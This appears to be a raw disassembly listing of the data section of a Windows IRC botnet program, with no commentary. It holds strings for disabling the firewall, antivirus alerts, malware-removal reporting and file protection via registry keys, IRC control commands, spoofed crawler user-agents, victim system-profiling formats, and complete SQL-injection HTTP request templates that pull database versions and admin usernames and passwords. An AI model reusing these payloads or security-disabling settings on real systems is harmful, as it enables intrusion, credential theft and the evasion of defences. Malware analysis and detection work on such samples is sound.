aTugnf_mqsdr0_0 db 'TuGNF.mQSDR0',0 ; DATA XREF: sub_41567F+6C�o
; sub_41C8B1+198�o ...
align 10h
aBwIj0rhpgj1 db 'bw/Ij0rhPgj1',0 ; DATA XREF: sub_41567F+77�o
; sub_420D91+2E�o
align 10h
aFuv1h_fi8sc db 'FuV1H.fi8SC/',0 ; DATA XREF: sub_41567F+82�o
; sub_420D91+42�o
align 10h
aLcxMHdpwr1 db 'lCX/m/HdpWr1',0 ; DATA XREF: sub_41567F+8D�o
; sub_41D110+1A�o ...
align 10h
aVozbg0sssom1 db 'vozbG0sSsoM1',0 ; DATA XREF: sub_41567F+98�o
; sub_41CAB4+3C�o ...
align 10h
aKc4l5_savs3_ db 'KC4L5.sAVS3.',0 ; DATA XREF: sub_41567F+A3�o
; sub_41CF25+F�o ...
align 10h
aWk12f0zbpla db 'wK12F0ZBpla/',0 ; DATA XREF: sub_41567F+AE�o
align 10h
aSpxmrGVbi0 db 'spxMr/G/vBI0',0 ; DATA XREF: sub_41567F+BC�o
; sub_4263D5+54�o
align 10h
a2nru_kpknx db '/2nRu.KpKNx/',0 ; DATA XREF: sub_41567F+C7�o
; sub_4263D5+60�o
align 10h
a7lybp1gunfm0_0 db '7LybP1GuNfm0',0 ; DATA XREF: sub_41567F+D2�o
; sub_4264CB+93�o
align 10h
a391myLxl28__0 db '391mY/LxL28.',0 ; DATA XREF: sub_41567F+DD�o
; sub_4264CB+F0�o
align 10h
a5h5br_qpSm1_0 db '5H5BR.qp/sm1',0 ; DATA XREF: sub_40A9FE+36C8�o
; sub_40A9FE+36F3�o ...
align 10h
aYjmlc1btsf10 db 'yJmlc1btsF10',0 ; DATA XREF: sub_40A9FE+320F�o
; sub_40A9FE+372F�o ...
align 10h
aZyvgp1mxobt0 db 'zyVGp1MxObt0',0 ; DATA XREF: sub_40A9FE+2C79�o
; sub_40A9FE+2F18�o ...
align 10h
aG7IvGks9l1 db 'g7/IV/gks9L1',0 ; DATA XREF: sub_40A9FE+307E�o
; sub_40A9FE+31B5�o ...
align 10h
aTugnf_mqsdr0 db 'TuGNF.mQSDR0',0 ; DATA XREF: sub_40A9FE+31E8�o
; sub_40A9FE+37DF�o ...
align 10h
aBwIj0rhpgj1_0 db 'bw/Ij0rhPgj1',0 ; DATA XREF: sub_41567F+122�o
align 10h
aFuv1h_fi8sc_0 db 'FuV1H.fi8SC/',0 ; DATA XREF: sub_41567F+12D�o
align 10h
aLcxMHdpwr1_0 db 'lCX/m/HdpWr1',0 ; DATA XREF: sub_40A9FE+364D�o
; sub_41567F+138�o
align 10h
aVozbg0sssom1_0 db 'vozbG0sSsoM1',0 ; DATA XREF: sub_41567F+143�o
align 10h
aKc4l5_savs3__0 db 'KC4L5.sAVS3.',0 ; DATA XREF: sub_41567F+14E�o
align 10h
dword_445D20 dd 16h ; sub_40A9FE+53E�r ...
dword_445D24 dd 5 ; sub_42045F+1BE�r ...
dword_445D28 dd 10h dd offset byte_454A54
dd offset byte_454A54
dword_445D34 dd 0D2A2910h, 6AC77A3Bh, 0Chdword_445D40 dd 0D2A2910h, 6AC17A3Dh, 0Ahdword_445D4C dd 0D2A2910h, 3Bhdword_445D54 dd 0D2A2910h, 897E75hdword_445D5C dd 0D2A2910h, 32967A21h, 0dword_445D68 dd 255C7325h, 73h ; sub_42045F+3D3�o ...
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: sub_418E0F+2A�o
; sub_434D70+24�o
aSoftwarePoli_0 db 'SOFTWARE\Policies\Microsoft\MRT',0 ; DATA XREF: sub_418FA1+527�o
aDontreportinfe db 'DontReportInfectionInformation',0 ; DATA XREF: sub_418FA1+522�o
align 4
aFirewalloverri db 'FirewallOverride',0 ; DATA XREF: sub_418FA1+511�o
align 10h
aFirewalldisabl db 'FirewallDisableNotify',0 ; DATA XREF: sub_418FA1+500�o
align 4
aAntivirusoverr db 'AntiVirusOverride',0 ; DATA XREF: sub_418FA1+4EC�o
align 4
aSoftwareMicr_0 db 'SOFTWARE\Microsoft\Security Center',0 ; DATA XREF: sub_418FA1+4E0�o
; sub_418FA1+4F1�o ...
align 10h
aAntivirusdisab db 'AntiVirusDisableNotify',0 ; DATA XREF: sub_418FA1+4DB�o
align 4
aSystemContro_0 db 'SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPol'
; DATA XREF: sub_418FA1+4AA�o
; sub_418FA1+4BE�o ...
db 'icy\DomainProfile',0
align 4
aDisablenotific db 'DisableNotifications',0 ; DATA XREF: sub_418FA1+494�o
; sub_418FA1+4CA�o
align 4
aDonotallowexce db 'DoNotAllowExceptions',0 ; DATA XREF: sub_418FA1+483�o
; sub_418FA1+4B9�o
align 10h
aSystemControls db 'SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPol'
; DATA XREF: sub_418FA1+477�o
; sub_418FA1+488�o ...
db 'icy\StandardProfile',0
align 4
aEnablefirewall db 'EnableFirewall',0 ; DATA XREF: sub_418FA1+472�o
; sub_418FA1+4A5�o
align 4
aSystemCurren_3 db 'SYSTEM\CurrentControlSet\Services\NetBT\Parameters',0
; DATA XREF: sub_418FA1+463�o
align 4
aTransportbindn db 'TransportBindName',0 ; DATA XREF: sub_418FA1+45E�o
align 10h
aDevice db '\Device\',0 ; DATA XREF: sub_418FA1+459�o
align 4
aAutosharewks db 'AutoShareWks',0 ; DATA XREF: sub_418FA1+448�o
align 4
aAutoshareserve db 'AutoShareServer',0 ; DATA XREF: sub_418FA1+437�o
aSfcscan db 'SFCScan',0 ; DATA XREF: sub_418FA1+426�o
aSoftwarePolici db 'Software\Policies\Microsoft\Windows NT\Windows File Protection',0
; DATA XREF: sub_418FA1+417�o
; sub_418FA1+42B�o
align 4
aSfcdisable db 'SFCDisable',0 ; DATA XREF: sub_418FA1+412�o
align 10h
aSystemCurren_2 db 'SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters',0
; DATA XREF: sub_418FA1+405�o
; sub_418FA1+43C�o ...
align 4
aSizreqbuf db 'SizReqBuf',0 ; DATA XREF: sub_418FA1+400�o
align 4
aMaxconnectio_0 db 'MaxConnectionsPerServer',0 ; DATA XREF: sub_418FA1+3E7�o
aSoftwareMicros db 'Software\Microsoft\Windows\CurrentVersion\Internet Settings',0
; DATA XREF: sub_418FA1+3D3�o
; sub_418FA1+3EC�o
aMaxconnections db 'MaxConnectionsPer1_0Server',0 ; DATA XREF: sub_418FA1+3CE�o
align 4
aSystemCurren_1 db 'SYSTEM\CurrentControlSet\Services\Afd\Parameters',0
; DATA XREF: sub_418FA1+3BB�o
align 4
aDisablerawsecu db 'DisableRawSecurity',0 ; DATA XREF: sub_418FA1+3B6�o
align 10h
aTcpnumconnecti db 'TcpNumConnections',0 ; DATA XREF: sub_418FA1+3A9�o
; sub_418FA1+553�o
align 4
aAllowuserrawac db 'AllowUserRawAccess',0 ; DATA XREF: sub_418FA1+398�o
align 4
aLargebuffersiz db 'LargeBufferSize',0 ; DATA XREF: sub_418FA1+38B�o
aTcpmaxdupacks db 'TcpMaxDupAcks',0 ; DATA XREF: sub_418FA1+377�o
align 4
aDefaultttl db 'DefaultTTL',0 ; DATA XREF: sub_418FA1+369�o
align 4
aSackopts db 'SackOpts',0 ; DATA XREF: sub_418FA1+35B�o
align 10h
aEnablepmtubhde db 'EnablePMTUBHDetect',0 ; DATA XREF: sub_418FA1+34E�o
align 4
aEnablepmtudisc db 'EnablePMTUDiscovery',0 ; DATA XREF: sub_418FA1+33E�o
aTcpwindowsize db 'TcpWindowSize',0 ; DATA XREF: sub_418FA1+331�o
align 4
aGlobalmaxtcpwi db 'GlobalMaxTcpWindowSize',0 ; DATA XREF: sub_418FA1+320�o
align 10h
aTcp1323opts db 'Tcp1323Opts',0 ; DATA XREF: sub_418FA1+30F�o
aStricttimewait db 'StrictTimeWaitSeqCheck',0 ; DATA XREF: sub_418FA1+2FF�o
align 4
aTcptimedwaitde db 'TcpTimedWaitDelay',0 ; DATA XREF: sub_418FA1+2F2�o
align 4
aMaxuserport db 'MaxUserPort',0 ; DATA XREF: sub_418FA1+2E4�o
aSystemCurren_0 db 'SYSTEM\CurrentControlSet\Services\Tcpip\Parameters',0
; DATA XREF: sub_418FA1+2DF�o
align 4
aSystemCurrentc db 'SYSTEM\CurrentControlSet\Control',0 ; DATA XREF: sub_418FA1+2CF�o
align 4
aWaittokillserv db 'WaitToKillServiceT',0 ; DATA XREF: sub_418FA1+2C5�o
align 10h
a5000 db '5000',0 ; DATA XREF: sub_418FA1+2C0�o
align 4
aBan db 'ban',0 ; DATA XREF: sub_418FA1+2B5�o
aRModeChanB1 db 'r MODE $chan +b $1',0 ; DATA XREF: sub_418FA1+2B0�o
align 10h
aHalfop db 'halfop',0 ; DATA XREF: sub_418FA1+2A3�o
align 4
aRModeChanH1 db 'r MODE $chan +h $1',0 ; DATA XREF: sub_418FA1+29E�o
align 4
aVoice db 'voice',0 ; DATA XREF: sub_418FA1+294�o
align 4
aRModeChanV1 db 'r MODE $chan +v $1',0 ; DATA XREF: sub_418FA1+28F�o
align 4
aOps db 'ops',0 ; DATA XREF: sub_418FA1+285�o
aRModeChanO1 db 'r MODE $chan +o $1',0 ; DATA XREF: sub_418FA1+280�o
align 10h
aCtc2 db 'ctc2',0 ; DATA XREF: sub_418FA1+276�o
align 4
aR1_ db 'r $1 :.',0 ; DATA XREF: sub_418FA1+271�o
off_4462D0 dd offset byte_637463 ; DATA XREF: sub_418FA1+267�o
aRPrivmsg1_ db 'r PRIVMSG $1 :.',0 ; DATA XREF: sub_418FA1+262�o
aSlap db 'slap',0 ; DATA XREF: sub_418FA1+258�o
align 4
aRPrivmsg1Slaps db 'r PRIVMSG $1 slaps for You!!',0 ; DATA XREF: sub_418FA1+253�o
align 4
aSlaps db 'slaps',0 ; DATA XREF: sub_418FA1+249�o
align 4
aRPrivmsg1GodDa db 'r PRIVMSG $1 god damnit,hard bitchslaps for you!!',0
; DATA XREF: sub_418FA1+244�o
align 4
dword_446348 dd 69614D02h, 6E65746Eh, 65636E61h, 2off_446358 dd offset aFastWebcrawler ; DATA XREF: .text:0041A163�r
; .text:0041A16C�r ...
; "FAST-WebCrawler/3.8 (atw-crawler at fas"...
dd offset aGooglebot2_0Ht ; "Googlebot/2.0 (+http://www.googlebot.co"...
dd offset aLynx2_8_4rel_1 ; "Lynx/2.8.4rel.1 libwww-FM/2.14 SSL-MM/1"...
dd offset aGooglebot2_1Ht ; "Googlebot/2.1 (+http://www.googlebot.co"...
dd offset aMicrosoftWebda ; "Microsoft-WebDAV-MiniRedir/5.1.2600"
dd offset aGooglebot2_0_0 ; "Googlebot/2.0 (http://www.google.com/bo"...
dd offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible; MSIE 4.01; Win"...
dd offset aGooglebot2_1_0 ; "Googlebot/2.1 (http://www.google.com/bo"...
dd offset aMozilla4_0Co_0 ; "Mozilla/4.0 (compatible; MSIE 4.01; Win"...
dd offset aGooglebot1_9Ht ; "Googlebot/1.9 (http://www.google.com/to"...
dd offset aMozilla4_0Co_1 ; "Mozilla/4.0 (compatible; MSIE 5.0; Wind"...
dd offset aGooglebot1_9_1 ; "Googlebot/1.9.1 (http://www.google.com/"...
dd offset aMozilla4_0Co_2 ; "Mozilla/4.0 (compatible; MSIE 5.5; Wind"...
dd offset aMozilla4_0Co_3 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
dd offset aMozilla4_0Co_4 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
dd offset aMozilla4_0Co_5 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
dd offset aMozilla4_0Co_6 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
dd offset aMozilla4_0Co_7 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
dd offset aMozilla4_0Co_8 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
dd offset aMozilla4_0Co_9 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
dd offset aMozilla4_0C_10 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
dd offset aMozilla5_0Comp ; "Mozilla/5.0 (compatible; MSIE 6.0; Wind"...
dd offset aMozilla5_0Co_0 ; "Mozilla/5.0 (compatible; MSIE 6.0; Wind"...
dd offset aMozilla5_0Co_1 ; "Mozilla/5.0 (compatible; MSIE 6.0; Wind"...
dd offset aMozilla5_0Co_2 ; "Mozilla/5.0 (compatible; MSIE 6.0; Wind"...
dd offset aMozilla5_0Co_3 ; "Mozilla/5.0 (compatible; MSIE 6.0; Wind"...
dd offset aMozilla5_0Co_4 ; "Mozilla/5.0 compatible ZyBorg/1.0 (wn.z"...
dd offset aMozilla4_75En ; "Mozilla/4.75 [en]"
dd offset aMozilla5_0Slur ; "Mozilla/5.0 (Slurp/cat; slurp@inktomi.c"...
dd offset aMozilla5_0Sl_0 ; "Mozilla/5.0 (Slurp/si; slurp@inktomi.co"...
dd offset aMozilla5_0Wind ; "Mozilla/5.0 (Windows; U; Windows NT 5.0"...
dd offset aMozilla5_0Wi_0 ; "Mozilla/5.0 (Windows; U; Windows NT 5.0"...
dd offset aMozilla5_0Wi_1 ; "Mozilla/5.0 (Windows; U; Windows NT 5.2"...
dd offset aMozilla5_0X11U ; "Mozilla/5.0 (X11; U; FreeBSD i386; en-U"...
dd offset aScooter3_2 ; "Scooter/3.2"
dd offset aWget1_8 ; "Wget/1.8"
dd offset aMozilla5_0X1_0 ; "Mozilla/5.0 (X11; U; openSuSe i686; SMP"...
dd offset aWget2_0 ; "Wget/2.0"
dd offset aMozilla5_0X1_1 ; "Mozilla/5.0 (X11; U; Ubuntu i386; en-US"...
dd offset aWget21 ; "Wget/2,1"
dd offset aMozilla5_0X1_2 ; "Mozilla/5.0 (X11; U; Ubuntu i386; en-US"...
dd offset dword_446404
dd 0
dword_446404 dd 73797870h, 392E312Fh, 342EhaMozilla5_0X1_2 db 'Mozilla/5.0 (X11; U; Ubuntu i386; en-US; rv:1.7.5) Gecko/20080112'
; DATA XREF: .text:004463F8�o
db 0
align 4
aWget21 db 'Wget/2,1',0 ; DATA XREF: .text:004463F4�o
align 10h
aMozilla5_0X1_1 db 'Mozilla/5.0 (X11; U; Ubuntu i386; en-US; rv:1.7) Gecko/20060502',0
; DATA XREF: .text:004463F0�o
aWget2_0 db 'Wget/2.0',0 ; DATA XREF: .text:004463EC�o
align 10h
aMozilla5_0X1_0 db 'Mozilla/5.0 (X11; U; openSuSe i686; SMP; en-US; rv:1.7) Gecko/200'
; DATA XREF: .text:004463E8�o
db '51223',0
align 4
aWget1_8 db 'Wget/1.8',0 ; DATA XREF: .text:004463E4�o
align 4
aScooter3_2 db 'Scooter/3.2',0 ; DATA XREF: .text:004463E0�o
aMozilla5_0X11U db 'Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.5) Gecko/20031021',0
; DATA XREF: .text:004463DC�o
align 8
aMozilla5_0Wi_1 db 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.5a) Gecko/20'
; DATA XREF: .text:004463D8�o
db '030728 Mozilla Firebird/0.7',0
align 4
aMozilla5_0Wi_0 db 'Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.5a) Gecko/20'
; DATA XREF: .text:004463D4�o
db '020718',0
aMozilla5_0Wind db 'Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.5) Gecko/200'
; DATA XREF: .text:004463D0�o
db '31007',0
align 4
aMozilla5_0Sl_0 db 'Mozilla/5.0 (Slurp/si; slurp@inktomi.com; http://www.inktomi.com/'
; DATA XREF: .text:004463CC�o
db 'slurp.html)',0
align 4
aMozilla5_0Slur db 'Mozilla/5.0 (Slurp/cat; slurp@inktomi.com; http://www.inktomi.com'
; DATA XREF: .text:004463C8�o
db '/slurp.html)',0
align 4
aMozilla4_75En db 'Mozilla/4.75 [en]',0 ; DATA XREF: .text:004463C4�o
align 10h
aMozilla5_0Co_4 db 'Mozilla/5.0 compatible ZyBorg/1.0 (wn.zyborg@looksmart.net; http:'
; DATA XREF: .text:004463C0�o
db '//www.WISEnutbot.com)',0
align 4
aMozilla5_0Co_3 db 'Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461)',0
; DATA XREF: .text:004463BC�o
align 8
aMozilla5_0Co_2 db 'Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; ODI3 Navigator'
; DATA XREF: .text:004463B8�o
db ')',0
align 10h
aMozilla5_0Co_1 db 'Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.3.1.0'
; DATA XREF: .text:004463B4�o
db ')',0
align 8
aMozilla5_0Co_0 db 'Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts'
; DATA XREF: .text:004463B0�o
db '-MyWay; (R1 1.3); .NET CLR 1.1.4322)',0
align 10h
aMozilla5_0Comp db 'Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; DigExt+ .NET C'
; DATA XREF: .text:004463AC�o
db 'LR)',0
align 4
aMozilla4_0C_10 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser;'
; DATA XREF: .text:004463A8�o
db ' .NET CLR 1.1.4322)',0
align 10h
aMozilla4_0Co_9 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4'
; DATA XREF: .text:004463A4�o
db '322; .NET CLR 1.0.3705)',0
align 10h
aMozilla4_0Co_8 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4'
; DATA XREF: .text:004463A0�o
db '322)',0
align 4
aMozilla4_0Co_7 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: .text:0044639C�o
align 10h
aMozilla4_0Co_6 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3'
; DATA XREF: .text:00446398�o
db '705; .NET CLR 1.1.4322)',0
align 4
aMozilla4_0Co_5 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)',0
; DATA XREF: .text:00446394�o
align 10h
aMozilla4_0Co_4 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows ME; Win 9x 4.90; H0108'
; DATA XREF: .text:00446390�o
db '18; AT&T CSM6.0)',0
align 4
aMozilla4_0Co_3 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461)',0
; DATA XREF: .text:0044638C�o
align 4
aMozilla4_0Co_2 db 'Mozilla/4.0 (compatible; MSIE 5.5; Windows ME)',0
; DATA XREF: .text:00446388�o
align 4
aGooglebot1_9_1 db 'Googlebot/1.9.1 (http://www.google.com/tools/bot.php)',0
; DATA XREF: .text:00446384�o
align 4
aMozilla4_0Co_1 db 'Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)',0
; DATA XREF: .text:00446380�o
align 4
aGooglebot1_9Ht db 'Googlebot/1.9 (http://www.google.com/tools/bot.php)',0
; DATA XREF: .text:0044637C�o
aMozilla4_0Co_0 db 'Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)',0
; DATA XREF: .text:00446378�o
aGooglebot2_1_0 db 'Googlebot/2.1 (http://www.google.com/bot.php)',0
; DATA XREF: .text:00446374�o
align 4
aMozilla4_0Comp db 'Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)',0
; DATA XREF: .text:00446370�o
aGooglebot2_0_0 db 'Googlebot/2.0 (http://www.google.com/bot.php)',0
; DATA XREF: .text:0044636C�o
align 4
aMicrosoftWebda db 'Microsoft-WebDAV-MiniRedir/5.1.2600',0 ; DATA XREF: .text:00446368�o
aGooglebot2_1Ht db 'Googlebot/2.1 (+http://www.googlebot.com/bot.html)',0
; DATA XREF: .text:00446364�o
align 10h
aLynx2_8_4rel_1 db 'Lynx/2.8.4rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.6',0
; DATA XREF: .text:00446360�o
align 4
aGooglebot2_0Ht db 'Googlebot/2.0 (+http://www.googlebot.com/bot.html)',0
; DATA XREF: .text:0044635C�o
align 10h
aFastWebcrawler db 'FAST-WebCrawler/3.8 (atw-crawler at fast dot no; http://fast.no/s'
; DATA XREF: .text:off_446358�o
db 'upport/crawler.asp)',0
align 4
aD_0 db '%d',0 ; DATA XREF: sub_41BE01+20E�o
align 4
asc_446DEC db 0Dh,0Ah ; DATA XREF: sub_419B11+BB�o
db 0Dh,0Ah,0
align 4
a@_6: ; DATA XREF: sub_419C4E+CF�o
; sub_419C4E+147�o ...
unicode 0, <@>,0
asc_446DF8: ; DATA XREF: sub_419C4E:loc_419CD4�o
; sub_4246F0+48�o ...
unicode 0, </>,0
aFtp db 'ftp',0 ; DATA XREF: sub_419C4E+72�o
; sub_419C4E:loc_419E07�o ...
aHttp db 'http',0 ; DATA XREF: sub_419C4E+62�o
; sub_419C4E+1A2�o ...
align 4
asc_446E08: ; DATA XREF: sub_419C4E+34�o
; sub_423C7A+3D5�o ...
unicode 0, <:>,0
aSSSU db '%s %s -> %s:%u',0 ; DATA XREF: .text:0041B0D3�o
align 4
aIframe db 'iframe',0 ; DATA XREF: .text:0041AD8E�o
align 4
aFrame db 'frame',0 ; DATA XREF: .text:loc_41AD7A�o
align 4
aEmbed db 'embed',0 ; DATA XREF: .text:loc_41AADC�o
align 4
off_446E34 dd offset byte_637273 ; DATA XREF: .text:0041A8F4�o
; .text:0041AB92�o ...
off_446E38 dd offset byte_676D69 ; DATA XREF: .text:loc_41A83E�o
align 10h
aGetS1UnionSe_1 db 'GET %s=-1+union+select+1,2,concat_ws(char(58),version(),user(),no'
; DATA XREF: .text:0041A7E5�o
db 'w()) HTTP/1.1',0Dh,0Ah
db 'Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, appl'
db 'ication/x-shockwave-flash, application/vnd.ms-excel, application/'
db 'msword, */*',0Dh,0Ah
db 'Accept-Language: en-us,en',0Dh,0Ah
db 'User-Agent: %s',0Dh,0Ah
db '%s',0Dh,0Ah
db 'Referer: %s',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 8
aGetS1UnionSe_0 db 'GET %s=-1+union+select+1,2,concat_ws(0x3a3a,Username,Password)+fr'
; DATA XREF: .text:0041A78E�o
db 'om+admin HTTP/1.1',0Dh,0Ah
db 'Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, appl'
db 'ication/x-shockwave-flash, application/vnd.ms-excel, application/'
db 'msword, */*',0Dh,0Ah
db 'Accept-Language: en-us,en',0Dh,0Ah
db 'User-Agent: %s',0Dh,0Ah
db '%s',0Dh,0Ah
db 'Referer: %s',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 10h
aGetS1UnionSele db 'GET %s=-1+union+select+database(),version(),system_user(),session'
; DATA XREF: .text:0041A737�o
db '_user(),current_user(),last_insert_id(),3,4,5,6,user()/* HTTP/1.1'
db 0Dh,0Ah
db 'Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, appl'
db 'ication/x-shockwave-flash, application/vnd.ms-excel, application/'
db 'msword, */*',0Dh,0Ah
db 'Accept-Language: en-us,en',0Dh,0Ah
db 'User-Agent: %s',0Dh,0Ah
db '%s',0Dh,0Ah
db 'Referer: %s',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 4
aHttpSDSS db 'http://%s:%d%s%s',0 ; DATA XREF: .text:0041A652�o
; .text:0041A9F5�o ...
align 4
aHttp_0 db 'http://',0 ; DATA XREF: .text:loc_41A600�o
; .text:loc_41A9A3�o ...
aHttpSDS db 'http://%s:%d%s',0 ; DATA XREF: .text:0041A5F0�o
; .text:0041A993�o ...
align 4
aHref db 'href',0 ; DATA XREF: .text:0041A551�o
align 4
aRefresh db '"Refresh"',0 ; DATA XREF: .text:0041A305�o
align 4
aMeta db 'meta',0 ; DATA XREF: .text:0041A2E9�o
align 10h
aGetSHttp1_1Acc db 'GET %s HTTP/1.1',0Dh,0Ah ; DATA XREF: .text:0041A225�o
; .text:0041A450�o ...
db 'Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, appl'
db 'ication/x-shockwave-flash, application/vnd.ms-excel, application/'
db 'msword, */*',0Dh,0Ah
db 'Accept-Language: en-us,en',0Dh,0Ah
db 'User-Agent: %s',0Dh,0Ah
db '%s',0Dh,0Ah
db 'Referer: %s',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 4
aHostSD db 'Host: %s:%d',0 ; DATA XREF: .text:0041A1F5�o
; .text:0041A423�o ...
aHostS db 'Host: %s',0 ; DATA XREF: .text:0041A1D6�o
; .text:0041A407�o ...
align 4
asc_44736C: ; DATA XREF: .text:0041A18D�o
; sub_424EAB+170�o
unicode 0, <=>,0
aFailedToParse_ db 'Failed to parse.',0 ; DATA XREF: .text:0041A102�o
align 4
off_447384 dd offset off_4374BC ; DATA XREF: .text:004380C4�o
; .text:00438414�o
dd 0
a_?avexception@ db '.?AVexception@@',0
off_44739C dd offset off_4374BC ; DATA XREF: .text:off_437F68�o
; .text:00437FFC�o ...
dd 0
a_?avlogic_erro db '.?AVlogic_error@std@@',0
align 4
off_4473BC dd offset off_4374BC ; DATA XREF: .text:off_438008�o
; .text:0043804C�o ...
dd 0
a_?avout_of_ran db '.?AVout_of_range@std@@',0
align 4
aInvalidVectorT db 'invalid vector<T> subscript',0 ; DATA XREF: sub_41B1F5+1E�o
dword_4473F8 dd 6E6B6E55h ; sub_42015A+2E�r
dword_4473FC dd 6E776Fh ; sub_42015A+3E�r
off_447400 dd offset byte_5C3A41 ; DATA XREF: sub_41BE01:loc_41C080�o
aSEndOfList_ db '%s End of list.',0 ; DATA XREF: sub_423719+BC�o
aDDayS0_2d0_2d0 db '%d day%s %0.2d:%0.2d:%0.2d',0 ; DATA XREF: sub_41B9F8+F2�o
align 10h
aS_2: ; DATA XREF: sub_41B9F8+E8�o
; sub_41BB89+65�o ...
unicode 0, <s>,0
a0_2d0_2d0_2d db '%0.2d:%0.2d:%0.2d',0 ; DATA XREF: sub_41B9F8+CE�o
align 4
aDDayS0_2d0_2d db '%d day%s %0.2d:%0.2d',0 ; DATA XREF: sub_41BB89+6E�o
align 10h
aSD_1 db '%s <%d>',0 ; DATA XREF: sub_41BB89+28�o
aSCpuI64umhzRam db '%s (CPU): %I64uMHz, (RAM): %sMB total, %sMB free, (OS): Windows %'
; DATA XREF: sub_41BE01+35A�o
db 's (%d.%d - %d). (SysDir): %s. (Computer Name): %s, (Current User)'
db ': %s, (Date): %s, (Time): %s, (UpTime): %s, (FreeSpace): %I64uGB/'
db '%I64uGB.',0
aHhMmSs db 'HH:mm:ss',0 ; DATA XREF: sub_41BE01+1C5�o
align 10h
aDddMmmDdYyyy db 'ddd, MMM dd, yyyy',0 ; DATA XREF: sub_41BE01+1A9�o
align 4
aSS_3 db '%s (%s)',0 ; DATA XREF: sub_41BE01+14A�o
a2k8 db '2K8',0 ; DATA XREF: sub_41BE01:loc_41BF11�o
; sub_41D318:loc_41D428�o ...
aVista_0 db 'Vista',0 ; DATA XREF: sub_41BE01+107�o
; sub_41D318+109�o ...
align 4
a2k3_0 db '2K3',0 ; DATA XREF: sub_41BE01+E7�o
; sub_41D318+EA�o ...
aXp db 'XP',0 ; DATA XREF: sub_41BE01+D5�o
; sub_41D318+DA�o ...
align 10h
a2k db '2K',0 ; DATA XREF: sub_41BE01+C3�o
; sub_41D318+CA�o ...
align 4
aMe_0 db 'ME',0 ; DATA XREF: sub_41BE01+A9�o
; sub_41D318+B1�o ...
align 4
aNt_0 db 'NT',0 ; DATA XREF: sub_41BE01+7B�o
; sub_41D318+8E�o ...
align 4
aD_D db '%d.%d',0 ; DATA XREF: sub_41BE01+3B�o
; sub_41D318+51�o ...
align 4
a??? db '???',0 ; DATA XREF: sub_41BE01+16�o
; sub_42015A+4A�o
aBandwidthDownl db '(Bandwidth): Downloaded: %s, Uploaded: %s.',0
; DATA XREF: sub_41C238+18B�o
align 8
aSConnectionSSI db '%s (Connection): %s (%s), (IntIP): %s, (ExtIP): %s, (HostName): %'
; DATA XREF: sub_41C238+16B�o
db 's, (Private): %s ',0
align 4
aNo db 'No',0 ; DATA XREF: sub_41C238+145�o
align 10h
aYes db 'Yes',0 ; DATA XREF: sub_41C238+13E�o
aSkb db '%sKB',0 ; DATA XREF: sub_41C238+108�o
align 4
aSgb db '%sGB',0 ; DATA XREF: sub_41C238+EA�o
align 4
aSmb db '%sMB',0 ; DATA XREF: sub_41C238+C7�o
align 4
off_44762C dd offset loc_412F4D+1 ; DATA XREF: sub_41C238:loc_41C2B0�o
off_447630 dd offset dword_4E414C ; DATA XREF: sub_41C238:loc_41C2A9�o
dword_447634 dd 6C616944h, 412F7075h, 4C5344hdword_447640 dd 20746F4Eh, 6E6E6F63h, 65746365h, 64haPingTimeout?DD db 'Ping Timeout? (%d-%d)%d/%d',0 ; DATA XREF: .text:0041C4C7�o
align 4
aSLoginListComp db '%s Login List complete.',0 ; DATA XREF: sub_41C7C5+69�o
aIEmpty db '<%i> <Empty>',0 ; DATA XREF: sub_41C7C5+46�o
align 4
aISS@S db '<%i> %s!%s@%s',0 ; DATA XREF: sub_41C7C5+34�o
align 4
aSLoginList db '%s Login List:',0 ; DATA XREF: sub_41C7C5+F�o
align 4
aSS0S db '%s %s * 0 :%s',0Dh,0Ah,0 ; DATA XREF: sub_41C8B1+1B1�o
aSS db '%s %s',0Dh,0Ah,0 ; DATA XREF: sub_41C8B1+168�o
; sub_41CAB4+41�o ...
